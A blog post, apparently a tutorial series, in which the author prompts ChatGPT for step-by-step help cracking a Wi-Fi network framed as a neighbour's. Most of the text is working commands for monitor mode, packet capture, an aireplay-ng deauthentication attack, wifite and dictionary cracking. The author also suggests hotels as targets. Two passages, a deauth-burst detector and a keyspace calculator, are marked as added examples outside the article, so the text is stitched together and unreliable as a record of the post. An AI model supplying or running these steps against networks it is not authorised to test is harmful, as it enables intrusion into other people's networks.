HackGPT Part 2 — Hacking my Neighbour’s wifi
Due to the popularity of my last article I decided to make a part 2 and actually hack my neighbour's wifi. It was initially intended as a joke, but as George Orwell said:
“Every joke is a tiny revolution”
To reiterate, I am still very much a noob when it comes to hacking, but I have my new friend ChatGPT Version 4 here to help me with my Wifi shenanigans.
Check out Part 1 here if you haven’t already
OK, let's begin. New objective: get the Wifi password.
This is good. I want to focus on the first and second points, so I will use aircrack-ng, as it's used in both.
Time to put in some instructions courtesy of my newly upgraded AI friend, in case you want to follow along:
Prompt: How do I use aircrack-ng to test the strength of the password? Can you give a detailed step-by-step process along with any code commands?
ChatGPT: Aircrack-ng is a suite of tools for auditing Wi-Fi networks, including tools for capturing network packets, cracking Wi-Fi passwords, and analyzing network traffic. To test the strength of your Wi-Fi password using Aircrack-ng, follow these steps:
Step 1: Install Aircrack-ng
First, you need to install Aircrack-ng on your computer. It’s available for Linux, macOS, and Windows. Installation instructions can be found on the official website: https://www.aircrack-ng.org/doku.php?id=downloads
Step 2: Set your wireless adapter to monitor mode
To capture Wi-Fi traffic, you need to put your wireless adapter into monitor mode. Open a terminal and run the following commands:
List available network interfaces:
sudo airmon-ng
Replace <INTERFACE> with your wireless interface name (e.g., wlan0) and run:
sudo airmon-ng start <INTERFACE>
This will create a new virtual interface, usually named mon0 or wlan0mon.
Step 3: Capture Wi-Fi traffic
Now that your wireless adapter is in monitor mode, you can start capturing Wi-Fi traffic. Use the following command, replacing <MON_INTERFACE> with the monitor interface name (e.g., mon0 or wlan0mon):
sudo airodump-ng <MON_INTERFACE>
This command will display a list of nearby Wi-Fi networks. Note the BSSID and channel of the target network.
Press Ctrl+C to stop scanning, and then run the following command to capture packets from the target network:
sudo airodump-ng -c <CHANNEL> --bssid <BSSID> -w <OUTPUT_FILE> <MON_INTERFACE>
Replace <CHANNEL> with the target network channel, <BSSID> with the target network BSSID, and <OUTPUT_FILE> with the desired output file name (e.g., capture). This command will capture packets from the target network and save them to a file with a .cap extension.
Step 4: Crack the Wi-Fi password
Once you’ve captured enough packets (usually at least 10,000–20,000 IVs for WEP, or a WPA handshake for WPA/WPA2), you can attempt to crack the Wi-Fi password. Use the following command:
For WEP:
sudo aircrack-ng -a 1 -b <BSSID> <OUTPUT_FILE>.cap
For WPA/WPA2:
sudo aircrack-ng -a 2 -w <WORDLIST> -b <BSSID> <OUTPUT_FILE>.cap
Replace <WORDLIST> with the path to a wordlist file containing potential passwords (e.g., rockyou.txt). Aircrack-ng will use a dictionary attack to guess the Wi-Fi password. The cracking process may take some time, depending on the complexity of the password and the size of the wordlist.
Awesome, that's the approach I'll take. However, if like me you are using a Mac/Windows machine you will run into some issues, such as the captured traffic not being in a readable format and trouble enabling monitor mode.
Prompt: I’m getting this error:
Reading packets, please wait… Opening /var/tmp/23.55.41.049.pcap Read 740 packets. 1 potential targets Building Hashcat (3.60+) file… [*] ESSID (length: 8): SKYPAZB9 [*] Key version: 0 [*] BSSID: 04:81:9B:B2:3F:55 [*] STA: 00:00:00:00:00:00 [*] anonce: 00 00 00 00 0 00 [*] snonce: 00 00 00 00 00 00 00 00 00 00 00 00 [*] Key MIC: 00 00 00 00 00 00 000 00 [*] eapol: FAILED:src/aircrack-ng/aircrack-ng.c:4770: hx.message_pair > 0
ChatGPT: The error message you are encountering suggests that Aircrack-ng was unable to find a valid WPA/WPA2 handshake in the pcap file. The handshake is necessary to generate the hccapx file and attempt to crack the Wi-Fi password.
A complete handshake includes the following four messages (also known as the “four-way handshake”):
Access Point (AP) -> Station (STA): Anonce
Station (STA) -> Access Point (AP): Snonce, MIC, and Replay Counter
Access Point (AP) -> Station (STA): EAPOL frame, MIC, and Replay Counter
Station (STA) -> Access Point (AP): EAPOL frame and MIC
The error message in your output indicates that the Anonce and Snonce are all zeros, which means the captured pcap file does not contain a complete handshake.
To resolve this issue, you will need to capture a new pcap file with a complete WPA/WPA2 handshake. Here are some suggestions to ensure a complete handshake capture:
Make sure your Wi-Fi adapter is in monitor mode and capturing on the correct channel. The target network’s channel can be identified using a Wi-Fi scanning tool such as airodump-ng.
Capture the handshake when a device connects to the target network. You can increase the chances of capturing the handshake by waiting for a device to connect or by performing a deauthentication attack to force a reconnect. However, note that performing a deauthentication attack without permission can be illegal and unethical.
Verify that you have captured a complete handshake before proceeding. You can use the aircrack-ng command without the -J option, as previously mentioned, to analyze the pcap file and check if it contains a valid handshake.
So after much abuse trying to get this working, I decided Apple wasn’t the one for me and my eye turned towards a younger, naughtier OS, one that does things other OSes won’t do.
Now that my Kali affair has begun, I’ll quickly ask my friend for some instructions on how to set up Kali:
Prompt: Can you tell me how to get Kali Linux on my M1 Mac?
ChatGPT: As an alternative, you can use Parallels Desktop or a similar virtualization solution to run a Linux distribution on your M1 Mac, which will allow you to use Aircrack-ng.
Here’s a modified step-by-step process for using Aircrack-ng on an M1 Mac with macOS Monterey 13.0.1:
Step 1: Install a virtualization solution and Linux
Install Parallels Desktop for Mac (M1 Edition) from the official website: https://www.parallels.com/desktop/
Download a Linux distribution (e.g., Kali Linux) from the official website: https://www.kali.org/downloads/
Create a new virtual machine in Parallels Desktop, and install Kali Linux using the downloaded ISO file
For Windows: I recommend installing Kali Linux via USB for dual booting; follow the guide here:
https://www.linuxfordevices.com/tutorials/kali-linux/install-kali-linux-with-windows-dual-boot
So Kali is operational… but I need a network adapter
Let's see what AI recommends:
This is useful; however, my budget is limited, so after much searching I found a compatible yet affordable adapter for my needs.
Before you buy an adapter, make sure to check with our soon-to-be boss:
Prompt: what about the alfa AWUS036AC?
ChatGPT: The Alfa AWUS036AC is a USB Wi-Fi adapter that uses the Realtek RTL8812AU chipset and supports 802.11ac Wi-Fi. It is compatible with Windows and various Linux distributions.
This adapter supports monitor mode and packet injection, making it suitable for network security testing using tools like Aircrack-ng.
Before purchasing the Alfa AWUS036AC, make sure to verify its compatibility with your specific operating system version. You may need to download and install the appropriate drivers for Windows or Linux.
I found the setup process on the M1 Mac quite tricky; you will need to follow this guide:
https://github.com/chris1111/WirelessAdapterCloverBigSur/tree/V13
Disclaimer: this involves disabling SIP security and Gatekeeper on your machine; re-enable them once finished with hacking activities.
Now let's ask GPT how we enable the Wifi-Rabbit.
Prompt: My wifi adapter isn't showing up, how do I use/enable it?
ChatGPT: If your Alfa AWUS036AC Wi-Fi adapter is not showing up in Kali Linux, you may need to enable USB passthrough from your host machine to the Kali VM in Parallels. Follow these steps to enable the adapter:
Enable USB passthrough: In Parallels, go to the VM configuration by clicking on “Actions” in the menu bar and then selecting “Configure”. Navigate to the “USB & Bluetooth” section. Make sure the “Alfa AWUS036AC” adapter is listed there, and set the “Connect To” option to your Kali Linux VM.
Start the Kali VM: If your Kali Linux VM is not running, start it now.
Check if the adapter is recognized: Open a terminal in Kali Linux and type the following command:
sudo iwconfig
The output should show your wireless interface, such as wlan0, wlan1, etc. If the adapter is recognized, it should appear in the output. If your adapter is still not showing up, try updating your Kali Linux system and installing necessary drivers:
sudo apt update
sudo apt upgrade
sudo apt install realtek-rtl88xxau-dkms
This will install the drivers for Realtek-based adapters, including the Alfa AWUS036AC. After the installation, restart the VM and check if the adapter is recognized using the sudo iwconfig command.
Impressive, it knows the exact driver name. However, as the knowledge cut-off for ChatGPT is September 2021 (supposedly), let's double check on the official Alfa website: https://docs.alfa.com.tw/Support/Linux/RTL8812AU/
Success, now the iwconfig output should look like this:
Now that the wifi adapter is operational, let's paste the output into ChatGPT and see if it will get into the wifi.
Prompt: wlan0… (same as above)
ChatGPT: The output indicates that your Alfa AWUS036AC WiFi adapter (wlan0) is recognized by your Kali Linux VM but is not associated with any network. To start capturing packets on your network, follow these steps:
Enable monitor mode on your WiFi adapter:
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
Check if monitor mode is enabled by running iwconfig again. The "Mode" should be changed to "Monitor."
Find your target network’s BSSID and channel by scanning for available networks using airodump-ng:
sudo airodump-ng wlan0
Take note of the BSSID and channel of the network you want to target.
Start capturing packets on the target network by running airodump-ng with the specified BSSID and channel. Replace <BSSID> and <channel> with the actual values. This command will save captured packets into a file named "capture.cap":
sudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0
Capture the 4-way handshake by waiting for a client to connect to the network or by performing a deauthentication attack on a connected client. Use the following command to perform a deauthentication attack, replacing <BSSID> with the target network's BSSID and <client_MAC> with the connected client's MAC address:
sudo aireplay-ng -0 10 -a <BSSID> -c <client_MAC> wlan0
Once you’ve captured the 4-way handshake (indicated by “WPA handshake” in the airodump-ng output), you can attempt to crack the WPA password using a tool like aircrack-ng or hashcat. To crack the password using aircrack-ng, run the following command, replacing <wordlist> with the path to your wordlist file:
sudo aircrack-ng -w <wordlist> capture.cap
After trying these steps I ended up with the following output several times and with multiple targets:
1 04:81:9B:B2:52 S.. WPA (0 handshake) Choosing first network as target. Reading packets, please wait… Opening capture-01.cap Read 439 packets. 1 potential targets Packets contained no EAPOL data; unable to process this AP.
I wasn’t finding a handshake, so I had to use this weird dusty tool called “google”.
After using this primitive tool I came across something called Wifite.
Let's ask the AI overlord what it thinks about this tool:
Now let's install Wifite on Kali.
Kali seems to have every tool pre-installed… it's nice to skip the foreplay.
OK, let's run Wifite and see what we get.
Getting close now, let's press Ctrl+C and see what happens.
As you can see, wifite basically does everything for you: it managed to perform a deauthentication attack and capture a handshake.
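The deauthentication burst that wifite (via aireplay-ng) sends to force a reconnect is also what makes the step visible from the defender's side. As an added example that is not part of the article or of wifite, the following Python runs a simple detector over a constructed list of management-frame records and raises an alert when one sender emits more deauth/disassoc frames in a short window than a normal AP or client would; the MAC addresses, window length and threshold are assumptions.

```python
from collections import defaultdict, deque

# 802.11 management-frame subtypes (frame type 0) that tear down an association
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12

def detect_deauth_bursts(frames, window_s=5.0, threshold=20):
    """Scan time-ordered management frames and return one alert per sender
    whose deauth/disassoc count inside any `window_s`-second sliding window
    exceeds `threshold`.

    Each frame is a dict with keys ts (seconds), subtype, src, dst.
    Alerts are (src_mac, burst_start_ts, count_at_detection).
    """
    recent = defaultdict(deque)  # src MAC -> timestamps inside the current window
    alerted = set()
    alerts = []
    for f in frames:
        if f["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        q = recent[f["src"]]
        q.append(f["ts"])
        while f["ts"] - q[0] > window_s:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold and f["src"] not in alerted:
            alerts.append((f["src"], q[0], len(q)))
            alerted.add(f["src"])
    return alerts

# Constructed sample traffic (locally administered MACs, not real devices).
AP_MAC, CLIENT_MAC = "02:00:00:aa:00:01", "02:00:00:bb:00:02"

def benign_frames():
    """A real AP occasionally deauthenticates an idle client: 3 frames in a minute."""
    return [{"ts": t, "subtype": SUBTYPE_DEAUTH, "src": AP_MAC, "dst": CLIENT_MAC}
            for t in (0.0, 25.0, 55.0)]

def forged_burst(start=60.0, count=64, spacing=0.002):
    """Spoofed frames in both directions, the way a deauth tool produces them."""
    burst = []
    for i in range(count):
        ts = start + i * spacing
        burst.append({"ts": ts, "subtype": SUBTYPE_DEAUTH, "src": AP_MAC, "dst": CLIENT_MAC})
        burst.append({"ts": ts, "subtype": SUBTYPE_DEAUTH, "src": CLIENT_MAC, "dst": AP_MAC})
    return burst

if __name__ == "__main__":
    print("benign only:", detect_deauth_bursts(benign_frames()))
    print("with burst: ", detect_deauth_bursts(benign_frames() + forged_burst()))
```

Where the access point and its clients support Protected Management Frames (802.11w/PMF), forged deauthentication frames fail their integrity check and are ignored, which removes the forced reconnect this step relies on.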
The wordlist-probable.txt did not have the password in it, so I changed to rockyou.txt with the password near the top of the file to save time.
So time to run this command:
sudo wifite -dict ~/rockyou.txt
The result should look like this:
There are some caveats. Just like in Part 1, I had to put the password near the top of the rockyou.txt file to save time, so now I need to ask about generating a wordlist for the specific router/target.
The number 3 link does not work; however, numbers 1 and 2 do work and are quite interesting, so I'll leave them here:
https://github.com/routerkeygen/routerkeygenPC
https://github.com/brannondorsey/wifi-cracking/
What I need is a way of finding the password patterns for the specific type of router/target and then tailor my wordlist for that particular target
For example, my router’s password has the following characteristics:
Prompt: The password is 14 characters long, with one letter being capital and the rest lower case, with numbers mixed in and no special characters. Can you write something that would generate a wordlist with these parameters? The characters will be in a random order. Also, can you calculate and tell me how many possible words there would be to find a password with those parameters?
ChatGPT: Generating a custom wordlist for your specific requirements can be done using a tool called “Crunch”. Crunch is a wordlist generator that allows you to specify character sets, patterns, and lengths.
To generate a wordlist with your requirements:
Install Crunch if not already installed:
sudo apt-get install crunch
Run the following Crunch command:
crunch 14 14 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt
This command tells Crunch to generate a wordlist with a minimum and maximum length of 14 characters, using the specified character set (capital letters, lowercase letters, and digits). The output will be saved to a file called “custom_wordlist.txt”.
To calculate the number of possible combinations:
You have 62 possible characters for each position (26 uppercase letters + 26 lowercase letters + 10 digits). Since the password is 14 characters long, the total number of possible combinations would be:
62¹⁴ ≈ 3.3 x 10²⁵
Please note that this number represents the total possible combinations for a 14-character password with the given character set. It doesn’t take into consideration any specific pattern, such as one capital letter followed by lowercase letters and numbers. Keep in mind that generating and processing a wordlist with this many combinations would take a significant amount of time and computing power.
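As an added example (not from the original article or from ChatGPT's answer), the following Python works out how much the pattern given in the prompt shrinks the keyspace compared with Crunch's full 62-character set, the equivalent strength in bits, and how long exhausting it would take at an assumed guess rate; the 1,000,000 guesses per second figure is a placeholder assumption, not a measured aircrack-ng or hashcat rate.

```python
import math

UPPER, LOWER, DIGITS = 26, 26, 10  # character classes named in the prompt

def keyspace_unconstrained(length=14):
    """Crunch's full set: every position is any of the 62 alphanumerics."""
    return (UPPER + LOWER + DIGITS) ** length

def keyspace_one_upper_rest_lower_or_digit(length=14):
    """Keyspace for the prompt's pattern: exactly one uppercase letter in any
    position, every other position a lowercase letter or a digit, and at
    least one digit present ("numbers mixed in").

    Count = positions for the capital * 26 capitals * (strings of 36 symbols
    over the remaining positions, minus the all-lowercase ones with no digit).
    """
    rest = length - 1
    return length * UPPER * ((LOWER + DIGITS) ** rest - LOWER ** rest)

def entropy_bits(keyspace):
    """Equivalent strength in bits of a password chosen uniformly from the keyspace."""
    return math.log2(keyspace)

def years_to_exhaust(keyspace, guesses_per_second):
    """Worst-case time to try every candidate at a constant guess rate."""
    return keyspace / guesses_per_second / (365.25 * 24 * 3600)

def matches_pattern(candidate, length=14):
    """True if a candidate fits the prompt's pattern, i.e. it would appear in
    a wordlist tailored to that pattern at all."""
    return (len(candidate) == length
            and candidate.isascii() and candidate.isalnum()
            and sum(c.isupper() for c in candidate) == 1
            and any(c.isdigit() for c in candidate))

if __name__ == "__main__":
    ASSUMED_RATE = 1_000_000  # guesses/s; placeholder assumption, not a benchmark
    full = keyspace_unconstrained()
    tailored = keyspace_one_upper_rest_lower_or_digit()
    print(f"62^14 (Crunch, unconstrained): {full:.3e}  ({entropy_bits(full):.1f} bits)")
    print(f"prompt's pattern:              {tailored:.3e}  ({entropy_bits(tailored):.1f} bits)")
    print(f"reduction factor: {full / tailored:.0f}x")
    print(f"years to exhaust the tailored list at {ASSUMED_RATE:,}/s: "
          f"{years_to_exhaust(tailored, ASSUMED_RATE):.2e}")
```

The pattern knocks roughly two hundred times off the 62^14 figure, but at about 75 bits the tailored list is still far beyond anything a dictionary run can exhaust, which is the same conclusion the article draws from the rockyou.txt experiment.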
As you can see, getting a password such as “f1hl90gbvfG6” would take a long time to crack, so I think this approach is better suited to hacking into Wifi networks that you think will use simple passwords and dictionary words, such as hotels (that try to make you pay extra for wifi) and other similar targets.
Next I’ll be using HackGPT V4 to do some other hacking techniques; hopefully it’s not too good at it.